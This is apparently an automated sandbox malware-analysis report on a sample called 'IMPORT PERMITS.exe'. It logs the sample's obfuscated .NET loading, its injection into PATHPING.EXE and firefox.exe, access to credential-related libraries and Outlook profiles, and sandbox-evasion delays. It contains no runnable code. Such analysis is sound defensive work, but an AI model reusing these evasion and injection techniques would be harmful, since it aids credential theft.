                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: gpapi.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeSection loaded: windowscodecs.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: version.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\PATHPING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: IMPORT PERMITS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: IMPORT PERMITS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: IMPORT PERMITS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: GPUK.pdbSHA256 source: IMPORT PERMITS.exe
                Source: Binary string: pathping.pdb source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000002.4121260219.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gKZXbGXeVZyo.exe, 00000006.00000000.1970482596.000000000071E000.00000002.00000001.01000000.0000000C.sdmp, gKZXbGXeVZyo.exe, 00000008.00000000.2122498147.000000000071E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: pathping.pdbGCTL source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000002.4121260219.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: IMPORT PERMITS.exe, 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2056921081.0000000002944000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2059145446.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: IMPORT PERMITS.exe, IMPORT PERMITS.exe, 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2056921081.0000000002944000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2059145446.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: GPUK.pdb source: IMPORT PERMITS.exe

                Data Obfuscation

                Source: IMPORT PERMITS.exe, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: IMPORT PERMITS.exe, MainForm.cs.Net Code: InitializeComponent
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, SSO9hfyRu5sPNhP9Tv.cs.Net Code: LB9tOSR4ba System.Reflection.Assembly.Load(byte[])
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, SSO9hfyRu5sPNhP9Tv.cs.Net Code: LB9tOSR4ba System.Reflection.Assembly.Load(byte[])
                Source: 0.2.IMPORT PERMITS.exe.5360000.3.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.IMPORT PERMITS.exe.a140000.4.raw.unpack, SSO9hfyRu5sPNhP9Tv.cs.Net Code: LB9tOSR4ba System.Reflection.Assembly.Load(byte[])
                Source: 0.2.IMPORT PERMITS.exe.3a00b90.2.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 7.2.PATHPING.EXE.32ccd14.2.raw.unpack, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 7.2.PATHPING.EXE.32ccd14.2.raw.unpack, MainForm.cs.Net Code: InitializeComponent
                Source: 8.2.gKZXbGXeVZyo.exe.33acd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 8.2.gKZXbGXeVZyo.exe.33acd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent
                Source: 8.0.gKZXbGXeVZyo.exe.33acd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 8.0.gKZXbGXeVZyo.exe.33acd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent
                Source: 9.2.firefox.exe.158cd14.0.raw.unpack, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 9.2.firefox.exe.158cd14.0.raw.unpack, MainForm.cs.Net Code: InitializeComponent
                Source: IMPORT PERMITS.exeStatic PE information: 0x8FE9D11E [Fri Jul 6 04:48:30 2046 UTC]
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 0_2_029368DC pushad ; iretd 0_2_029368DD
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0041187B push edx; iretd 2_2_00411881
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00405808 push 147E0EDDh; iretd 2_2_0040580F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004051E4 push esi; ret 2_2_004051E5
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004153EB push ebx; iretd 2_2_0041540B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00415B81 push ebp; ret 2_2_00415BE6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0040B40A pushad ; retf 2_2_0040B40B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00403420 push eax; ret 2_2_00403422
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_004175E8 push ds; iretd 2_2_004175F1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00413E64 push ds; retf 2_2_00413E6E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00415FC0 pushfd ; retf 2_2_00415FC6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_00417FFB push cs; retf 2_2_0041801A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013B225F pushad ; ret 2_2_013B27F9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013B27FA pushad ; ret 2_2_013B27F9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E09AD push ecx; mov dword ptr [esp], ecx2_2_013E09B6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013B283D push eax; iretd 2_2_013B2858
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013B1344 push eax; iretd 2_2_013B1369
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA225F pushad ; ret 7_2_02CA27F9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA27FA pushad ; ret 7_2_02CA27F9
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA283D push eax; iretd 7_2_02CA2858
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CD09AD push ecx; mov dword ptr [esp], ecx7_2_02CD09B6
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA1200 push edx; retf 0002h7_2_02CA1206
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA135E push eax; iretd 7_2_02CA1369
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA1BC7 push eax; retf 7_2_02CA1BBE
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA1BB7 push eax; retf 7_2_02CA1BBE
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA18A7 push ds; retf 7_2_02CA198E
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02CA19DB push 262802DCh; retf 7_2_02CA19EA
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004141C5 push ds; iretd 7_2_004141CE
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_004023E5 push 147E0EDDh; iretd 7_2_004023EC
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0040E458 push edx; iretd 7_2_0040E45E
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_00414BD8 push cs; retf 7_2_00414BF7
                Source: IMPORT PERMITS.exeStatic PE information: section name: .text entropy: 7.935527441310873
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, s1rCFR8N03xdpUgBPW.csHigh entropy of concatenated method names: 'Dispose', 'EJgao0l62P', 'hcUlAmgGiM', 'I5syyQDYAG', 'q9laK13CTW', 'JlDazCopno', 'ProcessDialogKey', 'KiIl7fTd7A', 'RTNlaHXIiE', 'yOEllxeprK'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, aPVkC3sUY9THDneml7.csHigh entropy of concatenated method names: 'GdGFLi57HZ', 'fHUFC78mcK', 'vfdF5kKxyo', 'qGKFAp6Qye', 'T0iF1wcug9', 'PIrFc3WXFM', 'VsEFBdhd6w', 'sEFFPXiQiu', 'VegFmUtYQE', 'CE9F6YN5Xt'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, T2rwlHBY0HKnqPWuww.csHigh entropy of concatenated method names: 'SX40Y3welW', 'P5i0U8gSpX', 'vdw02938pl', 'EU32KfxF19', 'D6k2z4rPHY', 'f9M07HZciO', 'fmj0aUdOvG', 'PTZ0lcI3cX', 'pW80RoK3cM', 'v9v0t2Bxcw'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, B9cgSgaRKLldsKMyTfA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eaWwvs4B0m', 'N3AwdO7Boh', 'HplwTsrjq3', 'gfywEnPcR2', 'S7FwheQ2Cp', 'i8twVH6lwn', 'bEFwD7hv14'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, SSO9hfyRu5sPNhP9Tv.csHigh entropy of concatenated method names: 'buWRJ3unos', 'Iu4RY4bduh', 'Eu5R8Sk48L', 'NMwRUwC9qj', 'KhRRqoLFtt', 'iheR2cHvlq', 'pWMR0Sc4DA', 'UWlRyZ73bC', 'pkeR3PgvST', 'v3fRXa23wg'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, LI0umUlFURor33drKF.csHigh entropy of concatenated method names: 'HL2OEmHUo', 'j3rNDoAX7', 'YxwQZH0Kq', 'EPArkZRAT', 'vKYC8Vnyr', 'N59WtxeLu', 'DEN5FwVIA6TI21MvVs', 'FQhPIluPRhr2BS109H', 'Vpx9dkPRD', 'iChwhNVVa'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, uJ2cQeL7dCfAKUv4kg.csHigh entropy of concatenated method names: 'zid8vSFQts', 'xpQ8d4KEki', 'BnK8TFAFYc', 'qVx8EPt9qu', 'uns8h1CWGU', 'XwU8V4PG9O', 'qle8DyQZdm', 'TSX8H677SQ', 'EW78oUJTX0', 'EN88KZU6jK'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, BoHPZxa7RvNPmEtVpD7.csHigh entropy of concatenated method names: 'Sp2MnBRhl6', 'UNKMgVL3mc', 'AgHMOHTrYl', 'r5GMNik3gM', 'BSEMkGVIgt', 'iplMQXYs6r', 'lO9Mrm1lta', 'q3fMLJLyaf', 'J8nMCh17oH', 'clAMWcsqPQ'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, rl13CTHWclDCopnopi.csHigh entropy of concatenated method names: 'fJ49YL4Lg4', 'G5c98QYpan', 'qgF9Umc11j', 'VGS9qkLSkA', 'aDT92bjkEd', 'lNg90pIjeT', 'odZ9yBEpZQ', 'R8r93FE5Gu', 'c239X7UwOR', 'Vpa9ZJWVwY'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, N4bxquUbn13KJuaQkX.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UxGlooHnuS', 'FAelKQQjbD', 'jXslznt4Hv', 'kmfR7xHfo9', 'HatRav3Njl', 'L8gRlPtNKZ', 'zZ7RRToisB', 'Mb2MecD2AKmEIZ2DyA'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, ic7kMf5J3gC5EWCncN.csHigh entropy of concatenated method names: 'EyA2Jor71M', 'p6S28Uj5Uh', 'OKv2qWokxI', 'r6G20loIMw', 'iLl2yuqo8W', 'zkSqhcnc83', 'KGCqV3Vr7T', 'AyVqDlmbim', 'd8pqHOsS0e', 'EZwqofMCxG'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, dWUavZj6Tp68FDuP0Z.csHigh entropy of concatenated method names: 'Tuq0ntVily', 'DRe0gByrSI', 'SqB0OKBo1w', 'TVB0NVcbt8', 'ih80kU0DCj', 'dHm0QyHPwY', 'VF60rof79V', 'vBO0LKBHZ3', 'CwW0C8Ebhr', 'b1H0Whq6dN'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, weprK8KgFP2C2s7YhK.csHigh entropy of concatenated method names: 'wDaMacEejQ', 'B94MRlPv6F', 'UlWMtW5fvK', 'M7FMYlZPif', 'J6OM8pEAnC', 'BUyMqQ1EAU', 'OstM2vhY7f', 'go09DmxaIe', 'Opl9Hx53Wi', 'opN9oqJaYe'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, dSpHj0tkjS2ugiVHZX.csHigh entropy of concatenated method names: 'O44a0J2cQe', 'adCayfAKUv', 'UR9aXtaLdS', 'ImHaZPWHoP', 'kRTabl8qc7', 'BMfaeJ3gC5', 'eevwdYbWi6NKXbLXHg', 'fXY7gTsy8IAWpCEwIG', 'F44aaoZjut', 'svOaRrxlWM'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, bcXUthCR9taLdS1mHP.csHigh entropy of concatenated method names: 'zABUN4a6c8', 'AuDUQg6Nfd', 'C5oUL28bOm', 'OBYUC71kZX', 'FkUUbDDPEV', 'oqFUefcwwq', 'P2NUS49cCc', 'hhAU9WV75h', 'DlBUMc68Pw', 'viRUwf80KJ'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, cqhbasV4dMhUVe5Q0m.csHigh entropy of concatenated method names: 'YXrSHWk8kH', 'OswSKasPst', 'GXC97rlaaw', 'e4m9aarQdT', 'DilS612NGv', 'taSSunWYkG', 'JMESsx4hBS', 'V6rSviqY0L', 'UW0Sd594fL', 'i41STswsc5'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, r57vERvG1vGkubsFHp.csHigh entropy of concatenated method names: 'NrLbmvOxrD', 'idrbuM2La9', 'o2SbvicVQ7', 'tJ9bdekGW4', 'KGRbAm3gPu', 'eBxbGIqUqT', 'hIwb1pnUFs', 'I2Abc6iFqD', 'oFXbpS5kwK', 'TmrbBL8Ksk'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, xfTd7AovTNHXIiEgOE.csHigh entropy of concatenated method names: 'gkp95IY2o8', 'qba9AAIBLq', 'nOP9GkjAwF', 'wqk915IxVW', 'G7J9v1FIBB', 'nWo9cJupph', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.IMPORT PERMITS.exe.44aa618.0.raw.unpack, lBo05wT8L3jNjs3gvY.csHigh entropy of concatenated method names: 'ToString', 'gJEe6856JL', 'ikceAa21rY', 'ioFeGPgELq', 'YT1e1Rbpxb', 'spuece4PAi', 'c0AepudyJT', 'NEheBm65rQ', 'mBsePoN9w6', 'ORiejmNjq0'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, s1rCFR8N03xdpUgBPW.csHigh entropy of concatenated method names: 'Dispose', 'EJgao0l62P', 'hcUlAmgGiM', 'I5syyQDYAG', 'q9laK13CTW', 'JlDazCopno', 'ProcessDialogKey', 'KiIl7fTd7A', 'RTNlaHXIiE', 'yOEllxeprK'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, aPVkC3sUY9THDneml7.csHigh entropy of concatenated method names: 'GdGFLi57HZ', 'fHUFC78mcK', 'vfdF5kKxyo', 'qGKFAp6Qye', 'T0iF1wcug9', 'PIrFc3WXFM', 'VsEFBdhd6w', 'sEFFPXiQiu', 'VegFmUtYQE', 'CE9F6YN5Xt'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, T2rwlHBY0HKnqPWuww.csHigh entropy of concatenated method names: 'SX40Y3welW', 'P5i0U8gSpX', 'vdw02938pl', 'EU32KfxF19', 'D6k2z4rPHY', 'f9M07HZciO', 'fmj0aUdOvG', 'PTZ0lcI3cX', 'pW80RoK3cM', 'v9v0t2Bxcw'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, B9cgSgaRKLldsKMyTfA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eaWwvs4B0m', 'N3AwdO7Boh', 'HplwTsrjq3', 'gfywEnPcR2', 'S7FwheQ2Cp', 'i8twVH6lwn', 'bEFwD7hv14'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, SSO9hfyRu5sPNhP9Tv.csHigh entropy of concatenated method names: 'buWRJ3unos', 'Iu4RY4bduh', 'Eu5R8Sk48L', 'NMwRUwC9qj', 'KhRRqoLFtt', 'iheR2cHvlq', 'pWMR0Sc4DA', 'UWlRyZ73bC', 'pkeR3PgvST', 'v3fRXa23wg'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, LI0umUlFURor33drKF.csHigh entropy of concatenated method names: 'HL2OEmHUo', 'j3rNDoAX7', 'YxwQZH0Kq', 'EPArkZRAT', 'vKYC8Vnyr', 'N59WtxeLu', 'DEN5FwVIA6TI21MvVs', 'FQhPIluPRhr2BS109H', 'Vpx9dkPRD', 'iChwhNVVa'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, uJ2cQeL7dCfAKUv4kg.csHigh entropy of concatenated method names: 'zid8vSFQts', 'xpQ8d4KEki', 'BnK8TFAFYc', 'qVx8EPt9qu', 'uns8h1CWGU', 'XwU8V4PG9O', 'qle8DyQZdm', 'TSX8H677SQ', 'EW78oUJTX0', 'EN88KZU6jK'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, BoHPZxa7RvNPmEtVpD7.csHigh entropy of concatenated method names: 'Sp2MnBRhl6', 'UNKMgVL3mc', 'AgHMOHTrYl', 'r5GMNik3gM', 'BSEMkGVIgt', 'iplMQXYs6r', 'lO9Mrm1lta', 'q3fMLJLyaf', 'J8nMCh17oH', 'clAMWcsqPQ'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, rl13CTHWclDCopnopi.csHigh entropy of concatenated method names: 'fJ49YL4Lg4', 'G5c98QYpan', 'qgF9Umc11j', 'VGS9qkLSkA', 'aDT92bjkEd', 'lNg90pIjeT', 'odZ9yBEpZQ', 'R8r93FE5Gu', 'c239X7UwOR', 'Vpa9ZJWVwY'
                Source: 0.2.IMPORT PERMITS.exe.4531e38.1.raw.unpack, N4bxquUbn13KJuaQkX.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UxGlooHnuS', 'FAelKQQjbD', 'jXslznt4Hv', 'kmfR7xHfo9', 'HatRav3Njl', 'L8gRlPtNKZ', 'zZ7RRToisB', 'Mb2MecD2AKmEIZ2DyA'
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\PATHPING.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: IMPORT PERMITS.exe PID: 6572, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\PATHPING.EXE API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\PATHPING.EXE API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\PATHPING.EXE API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\PATHPING.EXE API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\PATHPING.EXE API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\PATHPING.EXE API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\PATHPING.EXE API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\PATHPING.EXE API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory allocated: 1010000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory allocated: 29E0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory allocated: 2920000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory allocated: 76D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory allocated: 86D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory allocated: 8880000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory allocated: 9880000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory allocated: A1D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory allocated: B1D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_0142096E rdtsc 2_2_0142096E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\PATHPING.EXE Window / User API: threadDelayed 3657
                Source: C:\Windows\SysWOW64\PATHPING.EXE Window / User API: threadDelayed 6316
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\PATHPING.EXE API coverage: 2.6 %
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe TID: 6668 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 4280 Thread sleep count: 3657 > 30
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 4280 Thread sleep time: -7314000s >= -30000s
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 4280 Thread sleep count: 6316 > 30
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 4280 Thread sleep time: -12632000s >= -30000s
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe TID: 1704 Thread sleep time: -75000s >= -30000s
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe TID: 1704 Thread sleep count: 34 > 30
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe TID: 1704 Thread sleep time: -51000s >= -30000s
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe TID: 1704 Thread sleep count: 39 > 30
                Source: C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe TID: 1704 Thread sleep time: -39000s >= -30000s
                Source: C:\Windows\SysWOW64\PATHPING.EXE Last function: Thread delayed
                Source: C:\Windows\SysWOW64\PATHPING.EXE Code function: 7_2_0041C160 FindFirstFileW,FindNextFileW,FindClose, 7_2_0041C160
                Source: firefox.exe, 00000009.00000002.2352367469.0000018E4151C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllttRdP
                Source: gKZXbGXeVZyo.exe, 00000008.00000002.4121401540.00000000014EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
                Source: PATHPING.EXE, 00000007.00000002.4120881456.00000000006CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Process information queried: ProcessInformation
